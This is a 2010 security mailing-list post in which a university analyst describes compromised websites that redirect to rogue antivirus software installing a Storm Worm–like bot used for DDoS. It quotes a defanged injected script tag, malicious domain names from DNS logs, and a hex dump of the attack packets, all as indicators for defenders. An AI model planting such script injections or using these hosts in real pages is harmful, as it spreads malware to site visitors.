[nsp-sec] Breaking News(?) - Storm Worm masquerading as Fake Antivirus? Many DDoS Targets (and Heads up Google)
Brian Eckman
eckman at umn.edu
Tue May 4 15:16:07 EDT 2010
NSP-SEC
<disclaimer> Below is incomplete analysis being released now due to it
not being widely reported at the time analysis was started - minor
parts of it might be inaccurate; important parts of it have been
verified </disclaimer>
Numerous compromised Web sites are redirecting browsers to Rogue
Security software, which, if run by the user, installs Storm, or
something incredibly similar. (I am convinced it is "new Storm".)
The site that I visited had the following at the end of the HTML for
its index page: (defanged to prevent accidental access)
<script src="http://kdjkfjskdfjlskdjf(dot)com/kp.php"></script>
This redirects the browser to a Fake AV site within the xorg.pl domain
- which has been known for a while now to be up to no good.
My infected lab computer did the following every 7 seconds upon
running the FakeAV installer:
User-Agent: Ms276e
HEAD /
Host: 74.125.45.100
Ms276e was the name of the running process. Port 27777/tcp was opened
by the process, and was given an exception in Windows Firewall (w/o
prompting). I have no idea if these are static, or randomly chosen, so
using these indicators as IDS might not work well.
I have reason to believe that MANY Web sites have been compromised to
include the Javascript that leads to this. I don't know yet what they
have in common - they *might* be all blog sites though.
Below are DNS log snippets from the event. Time is CDT (GMT-0500),
www.yogadork(dot)com is one of the infected Web sites.
<snip>
(infected blog site omitted, all potentially hazardous host names
below defanged)
<snip>
(possibly harmful sites defanged)
May 4 12:31:59 client 10.20.68.25#61450: query: www.yogadork(dot)com IN A +
May 4 12:32:23 client 10.20.68.25#58257: query:
kdjkfjskdfjlskdjf(dot)com IN A +
May 4 12:32:23 client 10.20.68.25#57666: query:
www4.suitcase52td(dot)net IN A +
May 4 12:32:24 client 10.20.68.25#64873: query:
www1.safetypcwork5(dot)net IN A +
May 4 12:32:32 client 10.20.68.25#62094: query: www.symantec.com IN A +
May 4 12:33:39 client 10.20.68.25#57678: query:
www2.smartsoft27-pd.xorg(dot)pl IN A +
May 4 12:33:58 client 10.20.68.25#64874: query:
www2.smartsoft11-pd.xorg(dot)pl IN A +
May 4 12:35:28 client 10.20.68.25#50931: query:
update1.safelinkhere(dot)net IN A +
May 4 12:36:06 client 10.20.68.25#54218: query:
update2.safelinkhere(dot)net IN A +
May 4 12:36:06 client 10.20.68.25#61366: query:
secure1.cleanpayzone(dot)com IN A +
May 4 12:36:07 client 10.20.68.25#58256: query:
secure2.cleanpayzone(dot)net IN A +
May 4 12:36:07 client 10.20.68.25#64875: query:
www5.my-security-engine(dot)net IN A +
May 4 12:36:07 client 10.20.68.25#64876: query:
report.goodguardz(dot)com IN A +
May 4 12:36:10 client 10.20.68.25#57970: query:
update1.safelinkhere(dot)net IN A +
May 4 12:36:11 client 10.20.68.25#62136: query:
report.land-protection(dot)net IN A +
May 4 12:36:28 client 10.20.68.25#51751: query: myfairland(dot)com IN A +
May 4 12:36:38 client 10.20.68.25#60858: query:
secure1.securexzone(dot)com IN A +
May 4 12:36:38 client 10.20.68.25#65320: query:
secure2.securexzone(dot)net IN A +
May 4 12:36:39 client 10.20.68.25#59800: query:
update2.securepro.xorg(dot)pl IN A +
May 4 12:36:40 client 10.20.68.25#49395: query:
update1.securepro.xorg(dot)pl IN A +
May 4 12:36:42 client 10.20.68.25#62714: query:
report1.stat-mx.xorg(dot)pl IN A +
May 4 12:39:31 client 10.20.68.25#54889: query:
secure1.securexzone(dot)com IN A +
May 4 12:40:42 client 10.20.68.25#62874: query:
secure2.securexzone(dot)net IN A +
May 4 12:41:15 client 10.20.68.25#60349: query:
report.land-protection(dot)net IN A +
May 4 12:51:16 client 10.20.68.25#54828: query:
update1.safelinkhere(dot)net IN A +
May 4 12:51:25 client 10.20.68.25#54386: query: avcheck(dot)biz IN A +
May 4 12:51:28 client 10.20.68.25#56204: query: virtest(dot)com IN A +
May 4 12:51:45 client 10.20.68.25#57005: query:
antivirus-armature(dot)com IN A +
May 4 12:51:47 client 10.20.68.25#57005: query:
antivirus-armature(dot)com IN A +
May 4 12:51:49 client 10.20.68.25#57005: query:
antivirus-armature(dot)com IN A +
May 4 12:51:49 client 10.20.68.25#57005: query:
antivirus-armature(dot)com IN A +
May 4 12:51:53 client 10.20.68.25#57005: query:
antivirus-armature(dot)com IN A +
May 4 12:51:53 client 10.20.68.25#57005: query:
antivirus-armature(dot)com IN A +
<snip>
The infected host was running up-to-date SAVCE, nothing was
detected. I don't know yet if the symantec.com query noted above was
due to the infection or not; I suspect it was not related.
The ICMP packets used in the DDoS are 1028 byte ICMP Echo Requests
(1008 bytes of payload). The contents of them are all the same - ASCII
"a" through "w" (0x61 through 0x77) repeated 43 times, followed by "a"
through "k".
12:11:23.888421 IP (IP removed) > 62.122.75.103: ICMP echo request, id
1, seq 17661, length 1008
0x0000: <removed>
0x0010: <removed>
0x0020: 6162 6364 6566 6768 696a 6b6c 6d6e 6f70 abcdefghijklmnop
0x0030: 7172 7374 7576 7761 6263 6465 6667 6869 qrstuvwabcdefghi
0x0040: 6a6b 6c6d 6e6f 7071 7273 7475 7677 6162 jklmnopqrstuvwab
0x0050: 6364 6566 6768 696a 6b6c 6d6e 6f70 7172 cdefghijklmnopqr
0x0060: 7374 7576 7761 6263 6465 6667 6869 6a6b stuvwabcdefghijk
0x0070: 6c6d 6e6f 7071 7273 7475 7677 6162 6364 lmnopqrstuvwabcd
0x0080: 6566 6768 696a 6b6c 6d6e 6f70 7172 7374 efghijklmnopqrst
0x0090: 7576 7761 6263 6465 6667 6869 6a6b 6c6d uvwabcdefghijklm
0x00a0: 6e6f 7071 7273 7475 7677 6162 6364 6566 nopqrstuvwabcdef
0x00b0: 6768 696a 6b6c 6d6e 6f70 7172 7374 7576 ghijklmnopqrstuv
0x00c0: 7761 6263 6465 6667 6869 6a6b 6c6d 6e6f wabcdefghijklmno
0x00d0: 7071 7273 7475 7677 6162 6364 6566 6768 pqrstuvwabcdefgh
0x00e0: 696a 6b6c 6d6e 6f70 7172 7374 7576 7761 ijklmnopqrstuvwa
0x00f0: 6263 6465 6667 6869 6a6b 6c6d 6e6f 7071 bcdefghijklmnopq
0x0100: 7273 7475 7677 6162 6364 6566 6768 696a rstuvwabcdefghij
0x0110: 6b6c 6d6e 6f70 7172 7374 7576 7761 6263 klmnopqrstuvwabc
0x0120: 6465 6667 6869 6a6b 6c6d 6e6f 7071 7273 defghijklmnopqrs
0x0130: 7475 7677 6162 6364 6566 6768 696a 6b6c tuvwabcdefghijkl
0x0140: 6d6e 6f70 7172 7374 7576 7761 6263 6465 mnopqrstuvwabcde
0x0150: 6667 6869 6a6b 6c6d 6e6f 7071 7273 7475 fghijklmnopqrstu
0x0160: 7677 6162 6364 6566 6768 696a 6b6c 6d6e vwabcdefghijklmn
0x0170: 6f70 7172 7374 7576 7761 6263 6465 6667 opqrstuvwabcdefg
0x0180: 6869 6a6b 6c6d 6e6f 7071 7273 7475 7677 hijklmnopqrstuvw
0x0190: 6162 6364 6566 6768 696a 6b6c 6d6e 6f70 abcdefghijklmnop
0x01a0: 7172 7374 7576 7761 6263 6465 6667 6869 qrstuvwabcdefghi
0x01b0: 6a6b 6c6d 6e6f 7071 7273 7475 7677 6162 jklmnopqrstuvwab
0x01c0: 6364 6566 6768 696a 6b6c 6d6e 6f70 7172 cdefghijklmnopqr
0x01d0: 7374 7576 7761 6263 6465 6667 6869 6a6b stuvwabcdefghijk
0x01e0: 6c6d 6e6f 7071 7273 7475 7677 6162 6364 lmnopqrstuvwabcd
0x01f0: 6566 6768 696a 6b6c 6d6e 6f70 7172 7374 efghijklmnopqrst
0x0200: 7576 7761 6263 6465 6667 6869 6a6b 6c6d uvwabcdefghijklm
0x0210: 6e6f 7071 7273 7475 7677 6162 6364 6566 nopqrstuvwabcdef
0x0220: 6768 696a 6b6c 6d6e 6f70 7172 7374 7576 ghijklmnopqrstuv
0x0230: 7761 6263 6465 6667 6869 6a6b 6c6d 6e6f wabcdefghijklmno
0x0240: 7071 7273 7475 7677 6162 6364 6566 6768 pqrstuvwabcdefgh
0x0250: 696a 6b6c 6d6e 6f70 7172 7374 7576 7761 ijklmnopqrstuvwa
0x0260: 6263 6465 6667 6869 6a6b 6c6d 6e6f 7071 bcdefghijklmnopq
0x0270: 7273 7475 7677 6162 6364 6566 6768 696a rstuvwabcdefghij
0x0280: 6b6c 6d6e 6f70 7172 7374 7576 7761 6263 klmnopqrstuvwabc
0x0290: 6465 6667 6869 6a6b 6c6d 6e6f 7071 7273 defghijklmnopqrs
0x02a0: 7475 7677 6162 6364 6566 6768 696a 6b6c tuvwabcdefghijkl
0x02b0: 6d6e 6f70 7172 7374 7576 7761 6263 6465 mnopqrstuvwabcde
0x02c0: 6667 6869 6a6b 6c6d 6e6f 7071 7273 7475 fghijklmnopqrstu
0x02d0: 7677 6162 6364 6566 6768 696a 6b6c 6d6e vwabcdefghijklmn
0x02e0: 6f70 7172 7374 7576 7761 6263 6465 6667 opqrstuvwabcdefg
0x02f0: 6869 6a6b 6c6d 6e6f 7071 7273 7475 7677 hijklmnopqrstuvw
0x0300: 6162 6364 6566 6768 696a 6b6c 6d6e 6f70 abcdefghijklmnop
0x0310: 7172 7374 7576 7761 6263 6465 6667 6869 qrstuvwabcdefghi
0x0320: 6a6b 6c6d 6e6f 7071 7273 7475 7677 6162 jklmnopqrstuvwab
0x0330: 6364 6566 6768 696a 6b6c 6d6e 6f70 7172 cdefghijklmnopqr
0x0340: 7374 7576 7761 6263 6465 6667 6869 6a6b stuvwabcdefghijk
0x0350: 6c6d 6e6f 7071 7273 7475 7677 6162 6364 lmnopqrstuvwabcd
0x0360: 6566 6768 696a 6b6c 6d6e 6f70 7172 7374 efghijklmnopqrst
0x0370: 7576 7761 6263 6465 6667 6869 6a6b 6c6d uvwabcdefghijklm
0x0380: 6e6f 7071 7273 7475 7677 6162 6364 6566 nopqrstuvwabcdef
0x0390: 6768 696a 6b6c 6d6e 6f70 7172 7374 7576 ghijklmnopqrstuv
0x03a0: 7761 6263 6465 6667 6869 6a6b 6c6d 6e6f wabcdefghijklmno
0x03b0: 7071 7273 7475 7677 6162 6364 6566 6768 pqrstuvwabcdefgh
0x03c0: 696a 6b6c 6d6e 6f70 7172 7374 7576 7761 ijklmnopqrstuvwa
0x03d0: 6263 6465 6667 6869 6a6b 6c6d 6e6f 7071 bcdefghijklmnopq
0x03e0: 7273 7475 7677 6162 6364 6566 6768 696a rstuvwabcdefghij
0x03f0: 6b6c 6d6e 6f70 7172 7374 7576 7761 6263 klmnopqrstuvwabc
0x0400: 6465 6667 6869 6a6b defghijk
Note that I have NOT observed drive-by exploits leading to infection,
although it wouldn't surprise me if that happens at some point in
time. As it stands now, it appears that users need to be tricked into
running the FakeAV installer that is presented to them in order to
become infected.
The first time I saw this particular FakeAV leading to DDoS, etc. was
the afternoon of May 1st. I haven't gone back before that yet to see
if there was an earlier hit that we assumed was plain old Fake AV...
--------------------------------------------------------------
Below this is an excerpt from an email I sent out to local folks here.
You can take what you want from it (i.e., reword as you see fit, or
leave as-is, I don't care) and share outside of NSP-SEC, with optional
attribution to me, but *not* attributed to NSP-SEC.
--------------------------------------------------------------
We have seen a few hosts infected with what I believe to be a/the new
variant of "Storm Worm". What is unique is that the initial infection
is coming from compromised Web sites that redirect the browser to a
Fake AV site promoting "My Security Engine". When the user runs the
"My Security Engine" installer, it connects to a host on the Internet
to download the full package.
The M.O. so far is identical to what we've seen for Fake Antivirus for
years now, until....
The downloaded "full package" is between 2-3 MB - noticeably larger
than the FakeAV packages we typically see. The package does the usual
tricks to convince you to buy their software, it disables the ability
to run Task Manager, etc. However, it also opens up a TCP port, and
silently gives itself an exception in Windows Firewall. Then, within
minutes, it will likely be either spamming, and/or participating in a
*massive* distributed denial of service attack against literally
dozens of Internet hosts. (Clearly this is not a "documented feature"
of their Antivirus product.)
Feel free to pass this along to inform folks about the risks of rogue
Antivirus software - they might be getting a lot more than they
bargained for. I'll try to get more details released this afternoon.
Cheers,
Brian
--
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
More information about the nsp-security
mailing list